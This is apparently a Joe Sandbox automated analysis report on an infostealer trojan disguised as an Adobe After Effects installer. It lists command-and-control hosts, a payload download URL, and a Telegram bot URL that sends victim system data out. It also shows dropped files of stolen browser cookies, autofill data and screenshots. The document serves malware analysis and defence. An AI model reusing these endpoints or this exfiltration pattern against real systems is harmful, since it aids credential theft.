http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://116.202.0.187/1199;	0%	Avira URL Cloud	safe
https://objects.githubusercontent.com/	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://116.202.0.187/1199	0%	Avira URL Cloud	safe
https://climatejustice.social/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
github.com	140.82.121.3	true	false	high
ipinfo.io	34.117.59.81	true	false	high
t.me	149.154.167.99	true	false	high
api.telegram.org	149.154.167.220	true	false	high
objects.githubusercontent.com	185.199.108.133	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/verstappenf1r	false		high
http://116.202.0.187/	true	Avira URL Cloud: safe	unknown
http://ipinfo.io/json	false		high
http://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe	false		high
https://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A	false		high
http://116.202.0.187/update.zip	true	Avira URL Cloud: safe	unknown
https://github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe	false		high
http://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.55%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20Program%0A	false		high
http://116.202.0.187/1199	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	temp.2.dr	false		high
https://ipinfo.io/missingauth	AppLaunch.exe, 0000000E.00000002.543780633.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, json[1].json.14.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.2.dr	false		high
https://duckduckgo.com/ac/?q=	temp.2.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	temp.2.dr	false		high
http://ocsp.sectigo.com0	AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	false	URL Reputation: safe	unknown
https://github.com/n	AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	AppLaunch.exe, 00000002.00000003.465481735.0000000005353000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com0	AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	false	URL Reputation: safe	unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/479754935/9956e2fd-f4a0	AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.514112524.00000000053D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	temp.2.dr	false		high
https://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20work	AppLaunch.exe, 0000000E.00000002.543793950.0000000004D98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	temp.2.dr	false		high
http://apii.telegram.org/	AppLaunch.exe, 0000000E.00000002.544285112.0000000006C80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	temp.2.dr	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	false	URL Reputation: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	AppLaunch.exe, 00000002.00000003.467512305.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479887062.0000000025546000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491785107.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.529884781.0000000025544000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.480141322.0000000025547000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.479263262.0000000007033000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.491686731.0000000025542000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.467570977.0000000025548000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.2.dr, freebl3.dll.2.dr, mozglue.dll.2.dr, softokn3.dll.2.dr	false		high
https://github.com/	AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	false	URL Reputation: safe	unknown
http://116.202.0.187/1199;	AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://objects.githubusercontent.com/	AppLaunch.exe, 00000002.00000002.514036740.000000000533B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	AppLaunch.exe, 00000002.00000002.530076113.000000002586E000.00000004.00000800.00020000.00000000.sdmp, SRT2H1V9CYLP5LNSR3MB.exe.2.dr, Software[2].exe.2.dr	false	URL Reputation: safe	unknown
http://api.telegram.org/bot/start/sendMessage?chat_id=-1001457296348&text=%F0%9F%98%8E%20New%20worke	AppLaunch.exe, 0000000E.00000002.543793950.0000000004D98000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/verstappenf1rhttps://climatejustice.social/	MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, MzRn1YNrbz.exe, 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	false		high
https://climatejustice.social/	MzRn1YNrbz.exe, 00000000.00000003.460369691.0000000003070000.00000040.00001000.00020000.00000000.sdmp, MzRn1YNrbz.exe, 00000000.00000002.460941674.0000000000E59000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.513781962.0000000000438000.00000002.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	temp.2.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	temp.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
185.199.108.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	true
140.82.121.3	github.com	United States	36459	GITHUBUS	false
116.202.0.187	unknown	Germany	24940	HETZNER-ASDE	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	627182
Start date and time: 16/05/202210:28:07	2022-05-16 10:28:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MzRn1YNrbz (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/19@5/6
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 99.6% (good quality ratio 95.2%) Quality average: 82% Quality standard deviation: 25.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.54.89.106, 52.242.101.226, 40.125.122.176, 20.223.24.244
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target AppLaunch.exe, PID 6252 because there are no executed function
Execution Graph export aborted for target SRT2H1V9CYLP5LNSR3MB.exe, PID 4416 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: MzRn1YNrbz.exe

Simulations

Behavior and APIs

Time	Type	Description
10:30:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
10:30:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	TransactionAdviceReport 20220516-9910.exe	Get hash	malicious	Browse
	178306_AT_1001459828_20220516_E_1,PDF.exe	Get hash	malicious	Browse
	scan copy.exe	Get hash	malicious	Browse
	order confirmation copy.exe	Get hash	malicious	Browse
	Halkbank_Ekstre_20220513_082357_541079.exe	Get hash	malicious	Browse
	Dhl recent package delivery report needs attention.exe	Get hash	malicious	Browse
	S.O.A18052022.exe	Get hash	malicious	Browse
	e3.exe	Get hash	malicious	Browse
	d5.exe	Get hash	malicious	Browse
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse
	NN doc,TT Swift Copy.exe	Get hash	malicious	Browse
	SHIPPING DETAILS.PIF.EXE	Get hash	malicious	Browse
	Updatedcontract051222.exe	Get hash	malicious	Browse
	Halkbank_Ekstre_20220512_082357_541079.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.8516.exe	Get hash	malicious	Browse
	Angebot Nr. 58022.xlsx	Get hash	malicious	Browse
	doc_65398086_4190362045539.pdf.vbs	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Lazy.178938.10008.exe	Get hash	malicious	Browse
	VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe	Get hash	malicious	Browse
	TNT AWB.exe	Get hash	malicious	Browse
34.117.59.81	Factura0522.msi	Get hash	malicious	Browse	ipinfo.io/json
	Elden Ring Installer.exe	Get hash	malicious	Browse	ipinfo.io/json
	MTT0001450001.msi	Get hash	malicious	Browse	ipinfo.io/json
	14.exe	Get hash	malicious	Browse	ipinfo.io/json
	setup.exe	Get hash	malicious	Browse	ipinfo.io/json
	4oGNnPQu6F.exe	Get hash	malicious	Browse	ipinfo.io/json
	sTgblx2QnU.exe	Get hash	malicious	Browse	ipinfo.io/json
	Gnvjn2wVXc.exe	Get hash	malicious	Browse	ipinfo.io/json
	StartGame.exe	Get hash	malicious	Browse	ipinfo.io/json
	dSJT38E9q3.exe	Get hash	malicious	Browse	ipinfo.io/json
	WEsJ9FAJc3.exe	Get hash	malicious	Browse	ipinfo.io/json
	i3g9YoOXFn.exe	Get hash	malicious	Browse	ipinfo.io/json
	miner.exe	Get hash	malicious	Browse	ipinfo.io/json
	Launcher.exe	Get hash	malicious	Browse	ipinfo.io/json
	03Pendencia1651669126.zip	Get hash	malicious	Browse	ipinfo.io/json
	68e7a0fa9f7dbbb34bc4bad97690ea72.exe	Get hash	malicious	Browse	ipinfo.io/json
	0ZCojleMQL.exe	Get hash	malicious	Browse	ipinfo.io/json
	nlph8.msi	Get hash	malicious	Browse	ipinfo.io/json
	TGR9940001.msi	Get hash	malicious	Browse	ipinfo.io/json
	TGR44510001.msi	Get hash	malicious	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ipinfo.io	http://lmueaeabuuuaololobumuuuumeuowuelmaoeowelo.storage.googleapis.com/rKJNoyr#c971jeNpn12fYPD2631370zVb5755iXMN1	Get hash	malicious	Browse	34.117.59.81
	Setup.exe	Get hash	malicious	Browse	34.117.59.81
	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Get hash	malicious	Browse	34.117.59.81
	Factura0522.msi	Get hash	malicious	Browse	34.117.59.81
	Elden Ring Installer.exe	Get hash	malicious	Browse	34.117.59.81
	hdk8Z67C7x.exe	Get hash	malicious	Browse	34.117.59.81
	MTT0001450001.msi	Get hash	malicious	Browse	34.117.59.81
	14.exe	Get hash	malicious	Browse	34.117.59.81
	setup.exe	Get hash	malicious	Browse	34.117.59.81
	E2E8073A91C53E1EFF6FB4C067E6BE623937984828CE0.exe	Get hash	malicious	Browse	34.117.59.81
	4oGNnPQu6F.exe	Get hash	malicious	Browse	34.117.59.81
	sTgblx2QnU.exe	Get hash	malicious	Browse	34.117.59.81
	Gnvjn2wVXc.exe	Get hash	malicious	Browse	34.117.59.81
	TjDCLiM89x.exe	Get hash	malicious	Browse	34.117.59.81
	Xsploit.exe	Get hash	malicious	Browse	34.117.59.81
	StartGame.exe	Get hash	malicious	Browse	34.117.59.81
	dSJT38E9q3.exe	Get hash	malicious	Browse	34.117.59.81
	AFAC7896CF21983233C533EEAEC870610856969D98218.exe	Get hash	malicious	Browse	34.117.59.81
	WEsJ9FAJc3.exe	Get hash	malicious	Browse	34.117.59.81
	i3g9YoOXFn.exe	Get hash	malicious	Browse	34.117.59.81
github.com	Request For Quotation.js	Get hash	malicious	Browse	140.82.121.3
	Request For Quotation.js	Get hash	malicious	Browse	140.82.121.3
	PAYMENT_RECEIPT_INV8938464944.jar	Get hash	malicious	Browse	140.82.121.3
	Request For Quotation.js	Get hash	malicious	Browse	140.82.121.3
	Request For Quotation.js	Get hash	malicious	Browse	140.82.121.3
	Invoice_VC85262241.xll	Get hash	malicious	Browse	140.82.121.4
	Machine Info.jar	Get hash	malicious	Browse	140.82.121.4
	00987900.html	Get hash	malicious	Browse	140.82.121.3
	Purchase & Sale Contract.jar	Get hash	malicious	Browse	140.82.121.4
	proof of payment.js	Get hash	malicious	Browse	140.82.121.3
	proof of payment.js	Get hash	malicious	Browse	140.82.121.4
	launcher-disbalancer-go-client-windows-amd64.exe	Get hash	malicious	Browse	140.82.121.4
	6bRO4A0IY0.exe	Get hash	malicious	Browse	140.82.121.4
	funds_transfer2414.xls	Get hash	malicious	Browse	140.82.121.3
	funds_transfer2414.xls	Get hash	malicious	Browse	140.82.121.4
	funds_transfer2497.xls	Get hash	malicious	Browse	140.82.121.3
	payment_confirmation1808.xls	Get hash	malicious	Browse	140.82.121.4
	funds_transfer2497.xls	Get hash	malicious	Browse	140.82.121.3
	payment_confirmation1808.xls	Get hash	malicious	Browse	140.82.121.3
	payment_info788.xls	Get hash	malicious	Browse	140.82.121.4

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	Ts9rvG5gh7.exe	Get hash	malicious	Browse	149.154.167.99
	YYmn9vwmof.exe	Get hash	malicious	Browse	149.154.167.99
	uzrQEUY0DF.exe	Get hash	malicious	Browse	149.154.167.99
	TransactionAdviceReport 20220516-9910.exe	Get hash	malicious	Browse	149.154.167.220
	178306_AT_1001459828_20220516_E_1,PDF.exe	Get hash	malicious	Browse	149.154.167.220
	scan copy.exe	Get hash	malicious	Browse	149.154.167.220
	tsetup-x64.exe	Get hash	malicious	Browse	149.154.167.99
	tsetup-x64.exe	Get hash	malicious	Browse	95.161.76.100
	order confirmation copy.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20220513_082357_541079.exe	Get hash	malicious	Browse	149.154.167.220
	Dhl recent package delivery report needs attention.exe	Get hash	malicious	Browse	149.154.167.220
	S.O.A18052022.exe	Get hash	malicious	Browse	149.154.167.220
	https://telegra.ph/Invoice-05-13	Get hash	malicious	Browse	149.154.167.99
	e3.exe	Get hash	malicious	Browse	149.154.167.220
	d5.exe	Get hash	malicious	Browse	149.154.167.220
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse	149.154.167.220
	NN doc,TT Swift Copy.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING DETAILS.PIF.EXE	Get hash	malicious	Browse	149.154.167.220
	Updatedcontract051222.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20220512_082357_541079.exe	Get hash	malicious	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	YsAlmLpZun	Get hash	malicious	Browse	34.66.152.244
	http://lmueaeabuuuaololobumuuuumeuowuelmaoeowelo.storage.googleapis.com/rKJNoyr#c971jeNpn12fYPD2631370zVb5755iXMN1	Get hash	malicious	Browse	34.117.59.81
	1isequal9.arm7	Get hash	malicious	Browse	34.64.88.152
	myp0912.exe	Get hash	malicious	Browse	34.117.168.233
	Setup.exe	Get hash	malicious	Browse	34.117.59.81
	LchoV9NYJA.exe	Get hash	malicious	Browse	34.117.59.81
	E4B23EBEB82594979325357CE20F14F70143D98FF49A9.exe	Get hash	malicious	Browse	34.117.59.81
	IsQzUGbu7m	Get hash	malicious	Browse	34.117.135.72
	0vFX7VXc9U	Get hash	malicious	Browse	34.66.240.213
	BqGb82HXOA	Get hash	malicious	Browse	34.66.252.21
	9N2o3hk1Xl	Get hash	malicious	Browse	34.101.123.196
	XnOGg2qScM	Get hash	malicious	Browse	34.119.79.249
	BHef1lm0BZ	Get hash	malicious	Browse	34.119.108.38
	Factura0522.msi	Get hash	malicious	Browse	34.117.59.81
	https://0bit.cc/ZWJc	Get hash	malicious	Browse	34.117.167.199
	Elden Ring Installer.exe	Get hash	malicious	Browse	34.117.59.81
	tCw70S7gfO.exe	Get hash	malicious	Browse	34.64.183.91
	Resetter.exe	Get hash	malicious	Browse	34.117.59.81
	8E5WGAMhYQ	Get hash	malicious	Browse	34.66.215.32
	QoVTRd57A5.exe	Get hash	malicious	Browse	34.64.183.91

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\4YYGUQ5HBW956C5CCOF\d06ed635-68f6-4e9a-955c-4899f5f57b9a2092031932.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	94872
Entropy (8bit):	7.993567473701944
Encrypted:	true
SSDEEP:	1536:Ezg7XYoIKap4pR/jF7m+mvXszX3VtPfG1wzp6d/In6USaNxhD8ce81RBNuC:E07XYoIYbwTfk3DfG1OpM/wSaNxdxTb1
MD5:	616344BC934D93638F9B7CB4BCC2F9F2
SHA1:	24F8B65D0DDC9D0FB7CEF47E59D978B335054206
SHA-256:	4629D7264D883636E89EB7E6ED3229880B7E6CF5D5A18DD8C5B1403C3A349394
SHA-512:	989A1B805F6B593DCAB73850705BD124D6E0E7F7A3B00E5EB8B8B05F94B1F403CCF5F4BA5893FD7322B8666034B9160C768AC5AA35A56B2275F8BF5DB4A9F11F
Malicious:	false
Reputation:	unknown
Preview:	PK...........T............#.../Autofill/Google Chrome_Default.txtUT......b...b...b..PK...........T................/CC/Google Chrome_Default.txtUT......b...b...b..PK...........T..qu........".../Cookies/Google Chrome_Default.txtUT......b...b...b-.r.0......Q....C...H.T...RRs...j%.}.~..Z..{.ke.Q..X/....@.: .......\..^..8.i..^.6.s.".._s^_@5...L7.-.R.......O....f..N~.]O9b..[N........vL.].e?...<&.$..U.V..F.......Tp..s..C.0\|1..AY.l.....PK...........T............$.../Downloads/Google Chrome_Default.txtUT......b...b...b..PK...........T................/Files/Default.zipUT......b...b...bPK....................PK...........T............".../History/Google Chrome_Default.txtUT......b...b...b..PK...........T..qJ.....0....../information.txtUT......b...b...b...R....U..~......0.Lf<C0..@....-..+..&......c*?.#[.`7.,y..LM..t..]..b_..$h.4...........gD$".C..w..6.=..C...X..d.%.lq.-G...m.....n...8..w...r.#.n9....QN...j.@D...#.....:.+...gnr.A......c\|..H.z...._.\|..z.....q.aF.....;....zR.

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Cookies\Google Chrome_Default.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.85510047038065
Encrypted:	false
SSDEEP:	6:PkopYjdt38FfrfXoL2fgsQvYf6gOOr7kmh:copYxt3efJQAf6h2omh
MD5:	C4EBAFA07BE27655244E42B8F1151887
SHA1:	6462D6E731E6A06E92E1A2CBC547FC750E114A67
SHA-256:	EA80C2FBBF9258C495719B8E4284E7462826E61EDD2E706AFD46226DBC7C0E27
SHA-512:	80B3FC32559AB487C93C37E9B6A86803E6159A36FC84ADF1C5F71128784003A6CC5EE66134ABB0D56DCE433939FD419586B137B5D473152166FED73225EC8DA6
Malicious:	false
Reputation:	unknown
Preview:	.google.com.FALSE./.FALSE.1617281028.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\Files\Default.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	unknown
Preview:	PK....................

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\information.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12491
Entropy (8bit):	5.31098624852632
Encrypted:	false
SSDEEP:	192:EBOIOEsQnQS1M9rmflLkuxfpgBdQXRsg8qbNqqN:NxpQQ2grmtLkuxfpgUX2MboqN
MD5:	B7699A1751D68FE485E343330D583EBF
SHA1:	4B72F08880A240F6B6A866FA9F59DFF5FC039712
SHA-256:	670B06ECFA27DB9E2FADF6B08A094A455E07871C6C2ADD049897F24F5C7907BE
SHA-512:	47056B37C2DF98E3EE2C1145C3969642048F1905C772C79A51F1BB7B5A6CF398A6EAFCB15FA2050C8BE6C28782A76D6E5F69E87042913B0BB95F03402441A3ED
Malicious:	false
Reputation:	unknown
Preview:	Version: 52.1....Date: Mon May 16 10:29:49 2022..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe ..Work Dir: C:\ProgramData\4YYGUQ5HBW956C5CCOF ....Windows: Windows 10 Pro [x64]..Computer Name: 928100..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 16/5/2022 10:29:49..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [300]..- csrss.exe [400]..- wininit.exe [476]..- csrss.exe [492]..- winlogon.exe [568]..- services.exe [580]..- lsass.exe [616]..- fontdrvhost.exe [728]..- fontdrvhost.exe [736]..- svchost.exe [744]..- svchost.exe [812]..

C:\ProgramData\4YYGUQ5HBW956C5CCOF\files\screenshot.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	94169
Entropy (8bit):	7.916779766747861
Encrypted:	false
SSDEEP:	1536:CucIRcU5cxtStlgvVtCGKC5mr9JSJmV0Tmiz1suTBvo/k3agta8KhPiGvkBFxfHz:tckstStltG7mr9JR0m8sj/k3hfKh6hFN
MD5:	4FB49D51CD85F8542389E461BAE681DE
SHA1:	21C9D2C57332EFCEEEFF2D0048DDA8034087EC9B
SHA-256:	A72785FC9CF0073DF1B73D76AD3F94465076849ED482DEA7D1844E7316730F76
SHA-512:	AAE6DF956CA60655D74F4A6CB8394AEC08CA652D2AA8C26674BCE61664A917DE1849DFB7EB9CEAFCF1D7A23F32E8C9078372EF740297B736E33891DFFB9FA087
Malicious:	false
Reputation:	unknown
